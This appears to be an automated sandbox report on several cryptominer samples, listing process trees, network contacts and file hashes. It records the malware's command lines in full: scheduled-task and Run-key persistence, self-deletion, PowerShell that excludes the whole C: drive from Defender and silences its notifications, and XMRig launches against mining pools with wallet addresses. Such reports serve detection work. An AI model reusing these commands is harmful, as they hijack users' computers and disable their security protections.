| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
Analysis: behavioral7
Detonation Overview
Submitted
2022-09-07 13:02
Reported
2022-09-07 13:06
Platform
win7-20220812-en
Max time kernel
150s
Max time network
45s
Command Line
Signatures
Eternity
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 892 set thread context of 796 | N/A | C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe | C:\Windows\explorer.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
"C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping 127.0.0.1
C:\Windows\system32\schtasks.exe
schtasks /create /tn "a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
"C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"
C:\Windows\explorer.exe
C:\Windows\explorer.exe -a cryptonight -o pool.minexmr.com:4444 -u 49vkUmVaigPGUsSL7xMRTxHbf38TkAMKFVN57A17sxUujLNgmrKi7bFcwb73uRWepASSZJPEWf1Kn81nWdHKDhEnAANFvmW.Admin_ZERMMMDR -p x --max-cpu-usage=30 --donate-level=1
C:\Windows\system32\taskeng.exe
taskeng.exe {2693B212-B803-40D3-B586-7AEEA702C530} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
Files
memory/1976-54-0x000000013FE60000-0x0000000140076000-memory.dmp
memory/1976-55-0x000007FEFC511000-0x000007FEFC513000-memory.dmp
memory/1516-57-0x0000000000000000-mapping.dmp
memory/1728-56-0x0000000000000000-mapping.dmp
memory/1740-58-0x0000000000000000-mapping.dmp
memory/944-59-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
| MD5 | d5737f563015ca9df92bf17c6636db42 |
| SHA1 | 957099807b7ab2e38d583f84fb7059711feec61f |
| SHA256 | a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9 |
| SHA512 | d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518 |
memory/892-61-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
| MD5 | d5737f563015ca9df92bf17c6636db42 |
| SHA1 | 957099807b7ab2e38d583f84fb7059711feec61f |
| SHA256 | a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9 |
| SHA512 | d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518 |
Analysis: behavioral8
Detonation Overview
Submitted
2022-09-07 13:02
Reported
2022-09-07 13:06
Platform
win10v2004-20220812-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Eternity
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3476 set thread context of 2436 | N/A | C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe | C:\Windows\explorer.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
"C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping 127.0.0.1
C:\Windows\system32\schtasks.exe
schtasks /create /tn "a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
"C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"
C:\Windows\explorer.exe
C:\Windows\explorer.exe -a cryptonight -o pool.minexmr.com:4444 -u 49vkUmVaigPGUsSL7xMRTxHbf38TkAMKFVN57A17sxUujLNgmrKi7bFcwb73uRWepASSZJPEWf1Kn81nWdHKDhEnAANFvmW.Admin_GBQHURCC -p x --max-cpu-usage=30 --donate-level=1
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
Network
| Country | Destination | Domain | Proto |
| US | 93.184.221.240:80 | | tcp |
| US | 93.184.220.29:80 | | tcp |
| HN | 190.107.133.19:80 | | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 20.189.173.7:443 | | tcp |
| US | 13.107.4.50:80 | | tcp |
Files
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
| MD5 | d5737f563015ca9df92bf17c6636db42 |
| SHA1 | 957099807b7ab2e38d583f84fb7059711feec61f |
| SHA256 | a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9 |
| SHA512 | d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe.log
| MD5 | fff5cbccb6b31b40f834b8f4778a779a |
| SHA1 | 899ed0377e89f1ed434cfeecc5bc0163ebdf0454 |
| SHA256 | b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76 |
| SHA512 | 1a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9 |
Analysis: behavioral5
Detonation Overview
Submitted
2022-09-07 13:02
Reported
2022-09-07 13:06
Platform
win7-20220812-en
Max time kernel
151s
Max time network
133s
Command Line
Signatures
LoaderBot
xmrig
LoaderBot executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Usermode.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url | C:\Users\Admin\AppData\Local\Temp\Usermode.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Usermode.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\Usermode.exe" | C:\Users\Admin\AppData\Local\Temp\Usermode.exe | N/A |
Enumerates physical storage devices
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Usermode.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe
"C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe"
C:\Users\Admin\AppData\Local\Temp\Usermode.exe
"C:\Users\Admin\AppData\Local\Temp\Usermode.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping -n 3 127.0.0.1 & copy /Y "C:\Users\Admin\AppData\Local\Temp\setup.exe" "C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe" >> NUL
C:\Windows\SysWOW64\PING.EXE
ping -n 3 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp" /SL5="$8011E,2411950,352768,C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 86VwoTuZTDgF5trS4bcEkvXtoHhUySbTWaWD5K4chXXc6XEPtWSVJcB43EVa9fmhPwcXRDNJ1hY21QqQtH3MQShV1F4VWrX -p x -k -v=0 --donate-level=1 -t 1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pool.supportxmr.com | udp |
| FR | 141.94.96.195:3333 | pool.supportxmr.com | tcp |
Files
\Users\Admin\AppData\Local\Temp\Usermode.exe
| MD5 | c08501fa8eca8770f56a14bee65ca31a |
| SHA1 | 1631125fef2594684dceed63455c7816c5ce1e46 |
| SHA256 | 226494ab0effda8f789283a4b1a4b04d719b896d6315684c3b5b7262b8906385 |
| SHA512 | 5021a7123f502ae62128e02c65def41c7f375c5abca9334719e66938b7b80d3449f2aba08b3050fb9da7972f1ab3ae6f499f0a6ba1f46f515487047d54315025 |
C:\Users\Admin\AppData\Local\Temp\Usermode.exe
| MD5 | c08501fa8eca8770f56a14bee65ca31a |
| SHA1 | 1631125fef2594684dceed63455c7816c5ce1e46 |
| SHA256 | 226494ab0effda8f789283a4b1a4b04d719b896d6315684c3b5b7262b8906385 |
| SHA512 | 5021a7123f502ae62128e02c65def41c7f375c5abca9334719e66938b7b80d3449f2aba08b3050fb9da7972f1ab3ae6f499f0a6ba1f46f515487047d54315025 |
\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | df0fd86748ba867a58e017bb2311990f |
| SHA1 | d3a4f8e7ff824d6c8dfcd4c6be6f6435ffd1337e |
| SHA256 | 716e232390346c61dd7fc36cf381a5355ff825142b3ed5d70901cd1d4dd305f4 |
| SHA512 | 097136bb69d2251de255a36aa5115ed1f27d3283110f56b41ebc0ac1783982ffa76ece756cb03e60a3b5f0dcb42d7899b8f7a3e1398fe1c7a09a3d2a491bb6eb |
C:\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | df0fd86748ba867a58e017bb2311990f |
| SHA1 | d3a4f8e7ff824d6c8dfcd4c6be6f6435ffd1337e |
| SHA256 | 716e232390346c61dd7fc36cf381a5355ff825142b3ed5d70901cd1d4dd305f4 |
| SHA512 | 097136bb69d2251de255a36aa5115ed1f27d3283110f56b41ebc0ac1783982ffa76ece756cb03e60a3b5f0dcb42d7899b8f7a3e1398fe1c7a09a3d2a491bb6eb |
\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp
| MD5 | 36da68f5c3a7fe4dd3f589941160ac85 |
| SHA1 | 71c610db1bc62c9af3d23f819433a6cd89432fe8 |
| SHA256 | 95883809e3356924097775a13407a43bcf48aca640b7d795ea2ef4e2d261285e |
| SHA512 | 56c3431cab652fda44c4a102f8d16ccd7b9f96aebdb1a63bfc9c6f5e0dec99607562574f40e5e7a8666d8d5f76b6b4d8e8baef1b0629f1f64cf32786f8fb146c |
C:\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp
| MD5 | 36da68f5c3a7fe4dd3f589941160ac85 |
| SHA1 | 71c610db1bc62c9af3d23f819433a6cd89432fe8 |
| SHA256 | 95883809e3356924097775a13407a43bcf48aca640b7d795ea2ef4e2d261285e |
| SHA512 | 56c3431cab652fda44c4a102f8d16ccd7b9f96aebdb1a63bfc9c6f5e0dec99607562574f40e5e7a8666d8d5f76b6b4d8e8baef1b0629f1f64cf32786f8fb146c |
\Users\Admin\AppData\Local\Temp\is-BRD4J.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
\Users\Admin\AppData\Local\Temp\is-BRD4J.tmp\ISDone.dll
| MD5 | f26684a0b0999413be6751f335603471 |
| SHA1 | dcd054328740c4bbf00e11b0b8f00a00f311898d |
| SHA256 | 44e56185af5aae005e0298397e75ba0792a9cbb61341ddf07635536c62630890 |
| SHA512 | d1358b7142ca466a3ad17f09cdc283546aad9ebc454abf06f7673d46e4c5c59280d0bc673b4bdc557e3032d27aa261667de4284e9fc7d46aba64f89da807df3e |
\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 22b86c4bdd3a476351ebe051e2af9564 |
| SHA1 | 10c9928d20a1e272f58fef1a56434deabae68aa4 |
| SHA256 | fd37e08f7e809d14f9e73f802ac0a35c6cea8bfb1261504cafc660d306c21c45 |
| SHA512 | fd7e047096015472705e8127f66faa50d71f0e527a4d5b708a16f02289778c18ecd7715f35a37cdaa88a8a9c2786b369b0e23e4009be4f93a79ca0675f2ed982 |
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 22b86c4bdd3a476351ebe051e2af9564 |
| SHA1 | 10c9928d20a1e272f58fef1a56434deabae68aa4 |
| SHA256 | fd37e08f7e809d14f9e73f802ac0a35c6cea8bfb1261504cafc660d306c21c45 |
| SHA512 | fd7e047096015472705e8127f66faa50d71f0e527a4d5b708a16f02289778c18ecd7715f35a37cdaa88a8a9c2786b369b0e23e4009be4f93a79ca0675f2ed982 |
\Users\Admin\AppData\Local\Temp\is-BRD4J.tmp\botva2.dll
| MD5 | 67965a5957a61867d661f05ae1f4773e |
| SHA1 | f14c0a4f154dc685bb7c65b2d804a02a0fb2360d |
| SHA256 | 450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105 |
| SHA512 | c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b |
\Users\Admin\AppData\Local\Temp\is-BRD4J.tmp\b2p.dll
| MD5 | ab35386487b343e3e82dbd2671ff9dab |
| SHA1 | 03591d07aea3309b631a7d3a6e20a92653e199b8 |
| SHA256 | c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2 |
| SHA512 | b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09 |
Analysis: behavioral10
Detonation Overview
Submitted
2022-09-07 13:02
Reported
2022-09-07 13:06
Platform
win10v2004-20220901-en
Max time kernel
152s
Max time network
150s
Command Line
Signatures
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security Update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Windows Security Update\\WinSec.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4540 set thread context of 2072 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe
"C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Set-MpPreference -PUAProtection 1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Set-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender Security Center\\Notifications' -Name DisableNotifications -Value 1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Add-MpPreference -ExclusionPath C:\
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security Update';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security Update' -Value '"C:\Users\Admin\AppData\Local\Temp\Windows Security Update\WinSec.exe"' -PropertyType 'String'
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe --donate-level 0 --max-cpu-usage 50 -o pool.supportxmr.com:3333 -u 4774bMmQt7g8FfWNP1K51Tdy7v5DS2ZRYarJcEmpy8rAXnuycfKGerFdEawGvgHUnCePRxky732gfcowXbXHcwT69rhLT5w.rig16
Network
| Country | Destination | Domain | Proto |
| US | 209.197.3.8:80 | | tcp |
| FR | 2.18.109.224:443 | | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | pool.supportxmr.com | udp |
| FR | 141.94.96.71:3333 | pool.supportxmr.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe
| MD5 | a419d5d9882f43143818df7122c684a1 |
| SHA1 | 63a5ae4680d40c7c87d3b5b96317a8afbf42d071 |
| SHA256 | 594fcf39f956a9e3c7563d0a5ba815ccba997568160008b82065474d62c1a9b7 |
| SHA512 | 3d6fe541beffebb25c0bc5980a7b279c86d279b0ffbfcf5605535ec97be5b84ea6d7f0b7229fdb129dd6332e215c683e4853cf1306190489ef35f77580fea66a |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
